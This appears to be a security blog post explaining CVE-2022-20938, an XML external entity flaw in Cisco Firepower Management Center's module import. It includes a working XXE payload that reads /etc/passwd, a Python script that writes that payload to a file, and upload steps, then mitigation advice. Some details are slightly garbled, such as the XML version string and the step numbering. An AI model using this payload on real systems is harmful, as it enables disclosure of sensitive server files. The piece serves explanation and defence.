In November 2022, Cisco published CVE-2022-20938, detailing a vulnerability in the import function of the Cisco Firepower Management Center (FMC) administrative interface. While on the surface it looks technical, the risk is simple: if you can log in, you might be able to grab data you shouldn’t see with a specially-crafted file.
Let's unpack how attackers could use this bug, see some code snippets, and learn what can be done to stay safe.
Overview: What Is FMC and Where’s the Problem?
Cisco’s Firepower Management Center (FMC) lets administrators set up, monitor, and manage network security devices. To make life easier, FMC allows you to import configuration modules in XML format.
The vulnerability appears in the XML module import function. It doesn't properly check the incoming XML syntax, which means attackers can tailor XML files to do more than just import configs—they can actually pull sensitive info out of the system.
How Does the Vulnerability Work?
The bug stems from the way the FMC software parses XML files without strong restrictions. This classic mistake is known as “XML External Entity” (XXE) injection.
When XML is processed, it can include a feature called “external entities”—pieces of the document that get loaded from files or URLs outside the XML itself. If not properly checked, this can allow attackers to force the server to spit out files it shouldn’t, like configuration files, private keys, or even passwords.
1. Insufficient XML Validation
FMC didn’t implement strict XML parsing. By default, some XML libraries allow references to “entities” defined in the XML, which can pull in local files.
2. Authentication Required
You do need valid credentials to access the administrative interface, but it’s common for attackers to steal or guess those.
Exploit Example: Crafting A Malicious XML File
Suppose an attacker wants to read the system’s /etc/passwd file (a common initial test for this vulnerability).
<?xml version="1." encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<module>
<username>&xxe;</username>
</module>
When this XML is imported via the module import function, the XML parser tries to resolve &xxe;, which points to /etc/passwd. The contents of this file are then embedded in the parsing process and may get exposed to the attacker—sometimes in error messages, sometimes directly in the interface.
Upload: They upload the poisoned XML file above using the module import.
3. Receive Output: The attacker checks the user interface or error logs to retrieve sensitive data unexpectedly included there.
Here’s a basic Python3 snippet you could use to automatically create the exploit XML file
filename = "exploit.xml"
with open(filename, "w") as f:
f.write("""<?xml version="1." encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<module>
<username>&xxe;</username>
</module>
""")
print(f"[+] Written XXE file to {filename}")
Upload exploit.xml under the module import section, and review any feedback FMC gives you.
References & More Reading
- Cisco Security Advisory: cisco-sa-fmc-info-disc-BgVpLELn (November 2022)
- NIST National Vulnerability Database: CVE-2022-20938
- Learn more about “XML External Entity (XXE) Injection” from OWASP_Processing)
Mitigation
Cisco quickly responded. The fix? Only allow safe, restrictive XML parsing. If you're running FMC, update to a fixed version as soon as possible.
Workaround: Until then, make sure only trusted users can reach the administrative interface, control who can upload files, and monitor logs for suspicious import attempts.
Conclusion
CVE-2022-20938 is another example of how even after years of warnings, XML parsing keeps biting major vendors and risking sensitive organizational data. If you run Cisco Firepower, patch now and avoid the pain of a data leak caused by “just” a config import.
*Stay informed, stay secure! For more exclusive breakdowns of real-world security issues, keep reading our posts.*
Timeline
Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/21/2022 15:21:00 UTC